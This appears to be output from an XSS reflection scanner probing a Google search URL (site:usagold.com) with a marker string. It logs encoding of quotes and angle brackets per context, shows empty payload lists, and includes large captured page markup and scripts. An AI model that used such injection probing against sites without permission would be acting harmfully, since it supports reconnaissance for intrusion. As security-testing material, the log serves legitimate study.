<a class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/setprefs?safeui=on&amp;sig=0_4NoW94OBwZf5fKOdEDtsCjgbV4A%3D&amp;prev=https://www.google.com/search?sitesearch%3D(uvw%252522xyz%252527yxz%25253C/zxy%26q%3D" id="safesearch" data-ved="2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Qo_oBegQIARAM">
<a href="/advanced_search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;hl=en" class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" data-ved="2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Qo_oBegQIARAN">
<meta content="0;url=/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;gbv=1&amp;sei=fn6UXs27FaKc4-EPxaCe6A4" http-equiv="refresh">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	False

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	False

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
_______________________________________________________________________________________________________
https://www.google.com/search?sitesearch=usagold.com&q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [2]
<input class="gLFyf gsfi" maxlength="2048" name="q" type="text" jsaction="paste:puy29d" aria-autocomplete="both" aria-haspopup="false" autocapitalize="off" autocomplete="off" autocorrect="off" role="combobox" spellcheck="false" title="Search" value='(uvw"xyz&#39;yxz&lt;/zxy site:usagold.com' aria-label="Search" data-ved="0ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQ39UDCAk">
<div jsdata="GXYZuf;;AA4kgs" jscontroller="G3eKy" jsl="$t t-w-XilABeKRA;$x 0;" class="r-idt_59VFYT7U">

----------------------------------------------------------------------------------
HTML Context: [2]
<title>(uvw"xyz'yxz&lt;/zxy site:usagold.com - Google Search</title>
<em>(uvw&quot;xyz&#39;yxz&lt;/zxy site:usagold.com</em>

----------------------------------------------------------------------------------
Script Context: [1]
<script nonce="o1p73n8PMv6paBu2+yC6DQ==">(function(){google.ldi={};google.pim={};})();(function(){var u='/xjs/_/js/k\x3dxjs.s.en_GB.YlbWwcv8Rzo.O/ck\x3dxjs.s._psGpbc7COU.L.W.O/m\x3dFkg7bd,HcFEGb,IvlUe,MC8mtf,OF7gzc,RMhBfe,T4BAC,TJw5qb,TbaHGc,Y33vzc,ZyRBae,cdos,hsm,iDPoPb,jsa,mvYTse,tg8oTe,uz938c,vWNDde,ws9Tlc,yQ43ff,d,csi/am\x3dAAQAAMASgF13AJz_TQAAF8w4AAAggBvBxgIpIqEgAAGsuggCAQ/d\x3d1/dg\x3d2/ct\x3dzgms/rs\x3dACT90oGH5qsv6t9wsw0xPVUy40iHVnuuOQ';
setTimeout(function(){var b=document;var a="SCRIPT";"application/xhtml+xml"===b.contentType&&(a=a.toLowerCase());a=b.createElement(a);a.src=u;google.timers&&google.timers.load&&google.tick&&google.tick("load","xjsls");document.body.appendChild(a)},0);})();(function(){window.google.xjsu='/xjs/_/js/k\x3dxjs.s.en_GB.YlbWwcv8Rzo.O/ck\x3dxjs.s._psGpbc7COU.L.W.O/m\x3dFkg7bd,HcFEGb,IvlUe,MC8mtf,OF7gzc,RMhBfe,T4BAC,TJw5qb,TbaHGc,Y33vzc,ZyRBae,cdos,hsm,iDPoPb,jsa,mvYTse,tg8oTe,uz938c,vWNDde,ws9Tlc,yQ43ff,d,csi/am\x3dAAQAAMASgF13AJz_TQAAF8w4AAAggBvBxgIpIqEgAAGsuggCAQ/d\x3d1/dg\x3d2/ct\x3dzgms/rs\x3dACT90oGH5qsv6t9wsw0xPVUy40iHVnuuOQ';})();function _DumpException(e){throw e;}
function _F_installCss(c){}
(function(){google.spjs=false;google.snet=true;google.em=[];google.emw=false;google.pdt=0;google.uwp=false;})();(function(){var pmc='{\x22Fkg7bd\x22:{},\x22HcFEGb\x22:{},\x22IvlUe\x22:{},\x22MC8mtf\x22:{},\x22OF7gzc\x22:{},\x22RMhBfe\x22:{},\x22T4BAC\x22:{},\x22TJw5qb\x22:{},\x22TbaHGc\x22:{},\x22Y33vzc\x22:{},\x22ZyRBae\x22:{},\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22bgd\x22:{\x22ac\x22:true,\x22as\x22:true,\x22at\x22:0,\x22ea\x22:true,\x22ed\x22:0,\x22ei\x22:true,\x22el\x22:true,\x22ep\x22:true,\x22er\x22:true,\x22et\x22:0,\x22eu\x22:false,\x22wl\x22:false},\x22cdos\x22:{\x22cdobsel\x22:false},\x22csi\x22:{},\x22d\x22:{},\x22ddls\x22:{},\x22dvl\x22:{\x22cookie_secure\x22:true,\x22cookie_timeout\x22:86400,\x22driver_ui_type\x22:2,\x22jsc\x22:\x22[null,null,null,30000,null,null,null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[\\\x2286400000\\\x22,\\\x22604800000\\\x22,2.0]\\n,null,1]\\n\x22,\x22mnr_crd\x22:\x221\x22,\x22msg_dsc\x22:\x22From your Internet address\x22,\x22msg_dsc_url\x22:\x22\x22,\x22msg_dvl\x22:\x22From your device\x22,\x22msg_err\x22:\x22Location unavailable\x22,\x22msg_gps\x22:\x22Using GPS\x22,\x22msg_unk\x22:\x22Unknown\x22,\x22msg_upd\x22:\x22Update location\x22,\x22msg_use\x22:\x22Use precise location\x22,\x22uul_text\x22:\x22Lahore\x22},\x22foot\x22:{\x22pf\x22:true,\x22po\x22:true,\x22qe\x22:false},\x22gf\x22:{\x22pid\x22:196},\x22hsm\x22:{},\x22iDPoPb\x22:{},\x22jsa\x22:{\x22csi\x22:true,\x22csir\x22:100},\x22kyn\x22:{},\x22llc\x22:{},\x22lu\x22:{},\x22m\x22:{},\x22mUpTid\x22:{},\x22mpck\x22:{\x22me\x22:false},\x22mu\x22:{\x22murl\x22:\x22https://adservice.google.com/adsid/google/ui\x22},\x22mvYTse\x22:{},\x22sb_wiz\x22:{\x22rfs\x22:[],\x22stok\x22:\x22cEshV3-KGVmX6xbyzX1tQhBjL5E\x22},\x22sf\x22:{},\x22sonic\x22:{},\x22spch\x22:{\x22ae\x22:\x22Please check your microphone.  \\u003Ca href\x3d\\\x22https://support.google.com/chrome/?p\x3dui_voice_search\\\x22 target\x3d\\\x22_blank\\\x22\\u003ELearn more\\u003C/a\\u003E\x22,\x22hl\x22:\x22en-PK\x22,\x22im\x22:\x22Click \\u003Cb\\u003EAllow\\u003C/b\\u003E to start voice search\x22,\x22iw\x22:\x22Waiting...\x22,\x22lm\x22:\x22Listening...\x22,\x22lu\x22:\x22%1$s voice search not available\x22,\x22mb\x22:false,\x22ne\x22:\x22No Internet connection\x22,\x22nt\x22:\x22Didn\x27t get that. \\u003Cspan\\u003ETry again\\u003C/span\\u003E\x22,\x22nv\x22:\x22Please check your microphone and audio levels.  \\u003Ca href\x3d\\\x22https://support.google.com/chrome/?p\x3dui_voice_search\\\x22 target\x3d\\\x22_blank\\\x22\\u003ELearn more\\u003C/a\\u003E\x22,\x22pe\x22:\x22Voice search has been turned off.  \\u003Ca href\x3d\\\x22https://support.google.com/chrome/?p\x3dui_voice_search\\\x22 target\x3d\\\x22_blank\\\x22\\u003EDetails\\u003C/a\\u003E\x22,\x22rm\x22:\x22Speak now\x22},\x22tg8oTe\x22:{},\x22tl\x22:{\x22rvkey\x22:\x22AIzaSyC_9Rt88UMjzgg5pIVArnfuIVkJx4zCdTY\x22},\x22uz938c\x22:{},\x22vWNDde\x22:{},\x22vs\x22:{},\x22ws9Tlc\x22:{},\x22yQ43ff\x22:{}}';google.pmc=JSON.parse(pmc);})();(function(){var r=['sb_wiz','aa','abd','async','bgd','dvl','foot','kyn','lu','m','mUpTid','mpck','mu','sf','sonic','spch','tl','vs','exdc'];google.plm(r);})();(function(){var m=[[["root",[["t-w-XilABeKRA","idt_59VFYT7U","r-idt_59VFYT7U",null,null,"exdc"]
]
,""]
]
]
;google.jsc&&google.jsc.m(m);google.log('rfl','');})();(function(){var m=['AA4kgk','[\x22psy-ab\x22,\x22gws-wiz\x22,\x22(uvw\\\x22xyz\x27yxz\\u003c/zxy site:usagold.com\x22,\x22\x22,null,1,0,0,11,\x22en\x22,\x22cEshV3-KGVmX6xbyzX1tQhBjL5E\x22,\x22\x22,\x22gn6UXqr-HLKZ4-EP6_OCoA8\x22,0,\x22en-PK\x22,null,null,null,0,null,null,3,5,null,null,0,-1,0,0,0,\x22\x22,0,0,\x22\x22,null,0,null,0,null,\x22/suggest\x22,0,0,0,0,0]\n','AA4kgo','[0,0,0,[null,null,[[[3,null,null,[null,[[\x22qdr_\x22,1,6]\n,[\x22qdr_h\x22,0,6]\n,[\x22qdr_d\x22,0,6]\n,[\x22qdr_w\x22,0,6]\n,[\x22qdr_m\x22,0,6]\n,[\x22qdr_y\x22,0,6]\n,[\x22cdr_opt\x22,0,1,[1,\x22Custom range...\x22,null,\x22cdr:1,cd_min:x,cd_max:x\x22,\x22\x22,\x22text\x22,\x22\x22,\x22\x22,6,1,[[[\x22q\x22,\x22(uvw\\\x22xyz\x27yxz\\u003c/zxy site:usagold.com\x22]\n]\n]\n,\x22cdr_opt\x22,\x225/23/2004\x22,0]\n]\n]\n,0]\n]\n,[3,null,null,[null,[[\x22li_\x22,1,6]\n,[\x22li_1\x22,0,6]\n]\n,1]\n]\n]\n,null,[\x22tbs\x22]\n]\n]\n,null,null,[null,[[\x22/search?q\\u003d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\\u0026source\\u003dlnms\x22,null,null,\x22All\x22,1,null,1,null,null,\x22WEB\x22,[0,2]\n,null,null,0]\n,[\x22/search?q\\u003d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\\u0026source\\u003dlnms\\u0026tbm\\u003disch\x22,null,null,\x22Images\x22,0,null,1,null,null,\x22IMAGES\x22,[6,2]\n,null,null,6]\n,[\x22/search?q\\u003d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\\u0026source\\u003dlnms\\u0026tbm\\u003dvid\x22,null,null,\x22Videos\x22,0,null,1,null,null,\x22VIDEOS\x22,[13,2]\n,null,null,13]\n,[\x22/search?q\\u003d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\\u0026source\\u003dlnms\\u0026tbm\\u003dnws\x22,null,null,\x22News\x22,0,null,1,null,null,\x22NEWS\x22,[10,2]\n,null,null,10]\n]\n,[[\x22/search?q\\u003d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\\u0026source\\u003dlnms\\u0026tbm\\u003dbks\x22,null,null,\x22Books\x22,0,null,1,null,null,\x22BOOKS\x22,[2,2]\n,null,null,2]\n,[\x22/search?q\\u003d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\\u0026source\\u003dlnms\\u0026tbm\\u003dfin\x22,null,null,\x22Finance\x22,0,null,1,null,null,\x22FINANCE\x22,[22,2]\n,null,null,22]\n]\n]\n,null,1]\n','AA4kgs','[0,\x22inline\x22,2,2500,0,0]\n','AA4kgw','[null,null,1,30000,null,null,null,2,null,null,3,null,null,null,null,null,1,null,null,null,null,null,null,[31.506432,74.3473152]\n,null,null,null,null,0,null,null,null,null,null,null,null,0,\x221586790018\x22,null,null,null,null,null,1,null,null,[\x2286400000\x22,\x22604800000\x22,2.0]\n,null,1]\n','AA4kg0','[\x22https://www.google.com.pk/domainless/read?igu\\u003d1\x22,\x22AFz9ztvHAKq1NxtgiaWpGTrbu_FnkArxuQ:1586790018716\x22,3]\n','AA4kg4','[1,null,null,1261,1349,0]\n'];
var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"Yllh3e":"%.@.1586790018474922,104385714,4093688299]\n","zChJod":"%.@.]\n","pxO4Zd":"0","GWsdKe":"en-PK","SIsrTd":"false","LU5fGb":"false","w2btAe":"%.@.\"\",\"\",\"0\",null,null,null,1]\n","eptZe":"/_/WizRpcUi/","mXOY5d":"%.@.null,1]\n","fyLpDc":"","SsQ4x":"o1p73n8PMv6paBu2+yC6DQ\u003d\u003d","haqSDf":"rgba(0,0,0,.54)","oFa0q":"#fafafa","JpB3Ue":"60","JRGsye":"none","wB1JTc":"false","ODgkgd":"#fff","sPiebd":"false","MoAfyf":"#fff","ENmP1c":"rgba(204,204,204,.15)","tqXjO":"false","JVBnre":"false","OqjdAf":"true","kVbEH":"false","b1KZw":"#fff","MiTaT":"#1A73E8","KTkDB":"false","zHtpPb":"false","EuCkcd":"16","U6xP0":"#4285f4","Vdtb3d":"true","Tae7A":"true","iryGqc":"2","Mlljec":"false","xT28q":"false","ruHO7c":"#dd191d","X1bUEc":"arial,sans-serif-medium,sans-serif","fRkoq":"true","ZzVVh":"false","qDYzS":"0 2px 10px 0 rgba(0,0,0,0.2)","EiEfXb":"#ebebeb","eXPt4e":"400","FYBlgf":"false","ZLr84e":"true","K2vQjf":"#f8f8f8","hWyTvf":"false","tpLZye":"#fff","pxDH4c":"#0f9d58","zhkRO":"%.@.1,1,1,1,1,1,0,0,0,0]\n","rZYUef":"#f5f5f5","ymIfqf":"18","bXvyY":"#fff","aUt4Tc":"false","o07h3e":"0 4px 5px rgba(0,0,0,.16)","s6Rzec":"0 16px","abZ6pc":"#f9a825","AwPxw":"false","A2aVpb":"50","kvKIW":"false","Nk1Bhf":"#4285f4","AEMHld":"#eeeeee","o28sBd":"false","HWmJg":"#dcdcdc","EgTnfe":"true","YXGVrd":"true","A5tF3b":"false","qmiCId":"true","hbfefd":"#1A73E8","cdRSXc":"false","V0Bluc":"none","WyvaRd":"0 1px 1px rgba(0,0,0,.16)","zhBJde":"false","osNyZ":"1.0","bmAEG":"#d9d9d9","v44rSc":"#70757a","uRoR4d":"false","I69zkb":"rgba(204,204,204,.25)","QSF9Ec":"","Utapxe":"-webkit-","pLhKvc":"0","F4ULTd":"true","tqmosb":"#fff","owXwYb":"#f8f8f8","vIMrp":"true","Dc0uuf":"16","iwHJId":"15","n1Whrf":"false","kePaAc":"-4","NW4nA":"rgba(255,255,255,.7)","WnrBce":"rgba(0,0,0,.1)","VXIo7d":"8px","xeVOLe":"#689f38","ToXxme":"#e5e5e5","o9mzkf":"false","PngPbb":"rgba(0,0,0,.87)","KVmtZc":"rgba(255,255,255,.3)","q7vEEb":"false","UduJSb":"%.@.\"0 0\",0,0,20,20,\"/images/searchbox/desktop_searchbox_sprites302_hr.png\",\"20px\"]\n","lzJv9d":"#fff","in3Ilb":"#222","z70S0c":"false","WxHUzd":"true","QA73ad":"false","buGAI":"16","kL6Xwb":"false","Fcb4A":"#1A73E8","SezQgf":"500","Rnt1Qc":"false","X4DPRd":"true","h29koe":"32","Na6wt":"#e1e1e1","auaxA":"#222","KFdH8":"true","By1ejd":"16","z1x4kc":"true","TKn0F":"20px","pPtK5":"6","SuQiSc":"1.3","AYXCHc":"false","JyBo2c":"false","WMBRj":"#009688","FF58Bf":"true","PxA5sf":"rgba(0,0,0,.54)","B8Dib":"rgba(0,0,0,.87)","xBx7Dc":"36","BYw9f":"false","eo8dye":"#878787","X4yPd":"#1c3aa9","seVajd":"rgba(0,0,0,.12)","OjG6Qc":"#000","aKuscd":"#AECBFA","IfHuyb":"rgba(0,0,0,.54)","SfSmD":"#ebebeb","L6WyEf":"true","khoEPb":"#1a0dab","hqg9c":"#1878f0","ConpTc":"false","tyCgpc":"#fff","kkVYtc":"false","AYVQWe":"20px","UNVSy":"false","rRLesf":"0","fjc61":"false","NIYCKf":"28","tuTJ6d":"#b8b8b8","B0husb":"true","eE52Jd":"#5f6368","AQEr7b":"#c6c6c6","a7rhWc":"false","rWPbFe":"rgba(255,255,255,1)","QDXUyc":"#188038","BdVmgf":"16","D8A8he":"true","S7nbec":"16","y519we":"true","y1HZEd":"false","BwgO5":"16","bVUXme":"25","HjM8R":"#FFF","SATNMc":"1px solid #dfe1e5","GzC2p":"#fff","xDKXr":"false","SpZHZd":"true","u4NTBb":"40","BW8dtd":"rgba(248, 248, 248, 1)","jIrJIf":"14","IvNqzc":"true","tJ4Jdf":"11","srQSvc":"true","UnFEre":"16","EJG4vf":"pointer","wFGKdc":"false","Sgnmlc":"14px","RZ03Ve":"#5677fc","pDiOce":"false","sBpVac":"rgba(0,0,0,.26)","xz9C5b":"true","ZxI7Af":"#fafafa","vhCwfc":"false","fQC6Cf":"2px","H7aRye":"0px 5px 26px 0px rgba(0, 0, 0, 0.22), 0px 20px 28px 0px rgba(0, 0, 0, 0.30)","lLCPB":"true","iKzRxb":"#5f6368","gjAni":"#3c4043","QldWK":"6","k7G1xb":"15","lVRwic":"false","pch72b":"false","gbf9Eb":"58","W445Dc":"20","PuOePe":"false","ib0wve":"rgba(153,153,153,.2)","XgWQKd":"true","ekXXzb":"13px","j0DpSe":"false","RpI44b":"#ebebeb","umYEvb":"false","nMRhJe":"false","KgXmrd":"true","mJempe":"13","i7mh3e":"16","FbN3Qc":"rgba(0,0,0,.87)","ppkaeb":"0","LACYrf":"false","QnH6ad":"16","EqX55c":"652","PIn0Ab":"1px solid #DFE1E5","ue6nDb":"Roboto-Medium,Roboto-Regular","p7BdKe":"true","KD9WYe":"#1A73E8","dAFa0e":"false","eGDqv":"false","qj36Ef":"#323232","NvsKMd":"true","e2p8ee":"false","bDOvJc":"false","LIYDac":"arial,sans-serif","aD6AQe":"#757575","Ym5Ycb":"false","PYrjqe":"40","TUhOL":"#fafafa","SidP2e":"rgba(248, 248, 248, 0)","j9ZYRc":"true","R9GQh":"#fff","RJegIe":"#fffff0","OQZvxe":"0 2px 10px 0 rgba(0,0,0,0.2)","N31mf":"false","yFVHo":"true","Vzh4p":"0px 7px 6px -5px #DFE1E5","voc95c":"false","wku5sd":"false","klgere":"invert(1) hue-rotate(180deg)","bmQ7Rb":"false","VQfWj":"#c0c0c0","gqXETb":"#db4437","prFQBe":"#ebebeb","rx1dvd":"#f3f3f3","KdGe5c":"false","rX9Pnb":"16","oyB9kf":"rgba(0,0,0,.87)","rsd6be":"1","Hzi6pf":"#DFE1E5","y2Hs7d":"false","LnZAkd":"false","hgWJ8c":"false","g635Ab":"2px","wlwuHd":"false","FydCC":"true","VbmVYd":"true","FiZWae":"32","PPUcAe":"0px 0px 8px rgba(32, 33, 36, .24)","BoqNoc":"20px","VnH1Zb":"normal","MOPyub":"15","xvI8we":"#212121","iDTSkb":"true","T1V3fc":"#f4b400","AP8pqf":"rgba(0,0,0,.12)","imHXAf":"true","gir54":"0.4","V6eh7c":"16","xFbXr":"rgba(0,102,33,1)","KnXmRc":"10","dTMnbc":"false","fFepd":"-15","iniaFd":"true","jg5SCd":"false","qkXvHd":"500","ZMFELd":"false","WWz0vd":"false","S1ZUDf":"true","YWHUvb":"18px","JcUGee":"rgba(0,0,0,.54)","a8Umdd":"rgba(153,153,153,.4)","GTYTQ":"#ffeb3b"};window.IJ_values=["#fff","rgba(0,102,33,1)","rgba(0,0,0,.87)","rgba(0,0,0,.54)","rgba(255,255,255,1)","rgba(255,255,255,.7)",false,"%.@.\"\",\"\",\"0\",null,null,null,1]\n","0","%.@.null,1]\n","%.@.]\n","o1p73n8PMv6paBu2+yC6DQ\u003d\u003d","%.@.\"0 0\",0,0,20,20,\"/images/searchbox/desktop_searchbox_sprites302_hr.png\",\"20px\"]\n","en-PK",false,"","%.@.1586790018474922,104385714,4093688299]\n",false,"/_/WizRpcUi/"];})();google.x(null, function(){(function(){(function(){google.csct={};google.csct.ps='AOvVaw02AVG2E-2Hdn6RUARV-pH9\x26ust\x3d1586876418541920';})();})();(function(){(function(){google.csct.pi=true;})();})();(function(){(function(){
function f(){for(var c="&cshid="+google.cshid,d=document.querySelectorAll('[href^="/"]'),e=0,b;b=d[e++];){var a=b.getAttribute("href");a.match(/[\?|&](ei|ved)=/)&&-1==a.indexOf("cshid=")&&(-1==a.search("#")?b.setAttribute("href",a+c):(a=a.split("#"),b.setAttribute("href",a[0]+c+"#"+a[1])))}d=document.querySelectorAll("[ping]");for(e=0;b=d[e++];)a=b.getAttribute("ping"),-1==a.indexOf("cshid=")&&b.setAttribute("ping",a+c)};google.csh=google.csh||{};google.csh.ict=function(c){google.cshid&&(c&&window.MutationObserver?google.dclc(function(){(new MutationObserver(f)).observe(document.querySelector("body"),{attributes:!0,childList:!0,subtree:!0,characterData:!0})}):google.dclc(f))};}).call(this);})();(function(){(function(){var umo=false;google.csh.ict(umo);})();})();(function(){window.jsl=window.jsl||{};window.jsl.dh=window.jsl.dh||function(i,c,d){try{var e=document.getElementById(i);if(e){e.innerHTML=c;if(d){d();}}else{if(window.jsl.el){window.jsl.el(new Error('Missing ID.'),{'id':i});}}}catch(e){if(window.jsl.el){window.jsl.el(new Error('jsl.dh'));}}};})();(function(){window.jsl.dh('hdtbMenus','\x3cdiv class\x3d\x22hdtb-mn-cont\x22\x3e\x3cdiv id\x3d\x22XJDHvf\x22\x3e\x3c/div\x3e\x3cdiv class\x3d\x22hdtb-mn-hd\x22 aria-haspopup\x3d\x22true\x22 role\x3d\x22button\x22 tabindex\x3d\x220\x22\x3e\x3cdiv class\x3d\x22mn-hd-txt\x22\x3eAny time\x3c/div\x3e\x3cspan class\x3d\x22mn-dwn-arw\x22\x3e\x3c/span\x3e\x3c/div\x3e\x3cul class\x3d\x22hdtbU hdtb-mn-c\x22\x3e\x3cli class\x3d\x22hdtbItm hdtbSel\x22 id\x3d\x22qdr_\x22 tabindex\x3d\x220\x22\x3eAny time\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_h\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:h\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEBY\x22\x3ePast hour\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_d\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:d\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEBc\x22\x3ePast 24 hours\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_w\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:w\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEBg\x22\x3ePast week\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_m\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:m\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEBk\x22\x3ePast month\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_y\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:y\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEBo\x22\x3ePast year\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22vjyzWd\x22\x3e\x3cdiv jscontroller\x3d\x22Uuupec\x22 data-m\x3d\x22true\x22\x3e\x3cspan class\x3d\x22q\x22 id\x3d\x22cdrlnk\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22EEGHee\x22 data-ved\x3d\x222ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEBs\x22\x3eCustom range...\x3c/span\x3e\x3cdiv class\x3d\x22n5Ug4b\x22 style\x3d\x22display:none\x22\x3e\x3cdiv class\x3d\x22vOvh1b\x22 jsaction\x3d\x22xp3IKd\x22\x3e\x3c/div\x3e\x3cdiv class\x3d\x22J6UZg\x22\x3e\x3cdiv class\x3d\x22Jy9Ore\x22\x3eCustomised date range\x3c/div\x3e\x3clabel class\x3d\x22Qtsmnf tmDYm\x22 for\x3d\x22OouJcb\x22\x3eFrom\x3c/label\x3e\x3clabel class\x3d\x22Qtsmnf iWBKNe\x22 for\x3d\x22rzG2be\x22\x3eTo\x3c/label\x3e\x3cdiv class\x3d\x22Gwgzqd\x22 role\x3d\x22button\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22xp3IKd\x22\x3e\x3c/div\x3e\x3cdiv class\x3d\x22NwEGxd\x22\x3e\x3cdiv class\x3d\x22qomYCd\x22\x3e\x3c/div\x3e\x3cform action\x3d\x22/search\x22 class\x3d\x22T3kYXe\x22 method\x3d\x22get\x22\x3e\x3cinput name\x3d\x22q\x22 value\x3d\x27(uvw\x22xyz\x26#39;yxz\x26lt;/zxy site:usagold.com\x27 type\x3d\x22hidden\x22\x3e\x3cinput name\x3d\x22source\x22 type\x3d\x22hidden\x22 value\x3d\x22lnt\x22\x3e\x3cinput value\x3d\x22cdr:1,cd_min:x,cd_max:x\x22 id\x3d\x22HjtPBb\x22 name\x3d\x22tbs\x22 type\x3d\x22hidden\x22\x3e\x3cinput value\x3d\x22\x22 name\x3d\x22tbm\x22 type\x3d\x22hidden\x22\x3e\x3cinput class\x3d\x22OouJcb ktf mini\x22 type\x3d\x22text\x22 value\x3d\x22\x22 autocomplete\x3d\x22off\x22 id\x3d\x22OouJcb\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22focus:daRB0b\x22\x3e\x3cinput class\x3d\x22rzG2be ktf mini\x22 type\x3d\x22text\x22 value\x3d\x22\x22 autocomplete\x3d\x22off\x22 id\x3d\x22rzG2be\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22focus:daRB0b\x22\x3e\x3cinput class\x3d\x22Ru1Ao ksb mini\x22 value\x3d\x22Go\x22 tabindex\x3d\x220\x22 type\x3d\x22submit\x22 jsaction\x3d\x22tnv.scf\x22\x3e\x3c/form\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e\x3c/li\x3e\x3c/ul\x3e\x3cspan class\x3d\x22hQKUmb\x22\x3e\x3c/span\x3e\x3cdiv class\x3d\x22hdtb-mn-hd\x22 aria-haspopup\x3d\x22true\x22 role\x3d\x22button\x22 tabindex\x3d\x220\x22\x3e\x3cdiv class\x3d\x22mn-hd-txt\x22\x3eAll results\x3c/div\x3e\x3cspan class\x3d\x22mn-dwn-arw\x22\x3e\x3c/span\x3e\x3c/div\x3e\x3cul class\x3d\x22hdtbU hdtb-mn-c\x22\x3e\x3cli class\x3d\x22hdtbItm hdtbSel\x22 id\x3d\x22li_\x22 tabindex\x3d\x220\x22\x3eAll results\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22li_1\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3d(uvw%22xyz%27yxz%3C/zxy+site:usagold.com\x26amp;source\x3dlnt\x26amp;tbs\x3dli:1\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQpwV6BAgBEB4\x22\x3eVerbatim\x3c/a\x3e\x3c/li\x3e\x3c/ul\x3e\x3cspan class\x3d\x22hQKUmb\x22\x3e\x3c/span\x3e\x3c/div\x3e');})();(function(){google.drty&&google.drty();})();});</script>

----------------------------------------------------------------------------------
URI Context: [12]
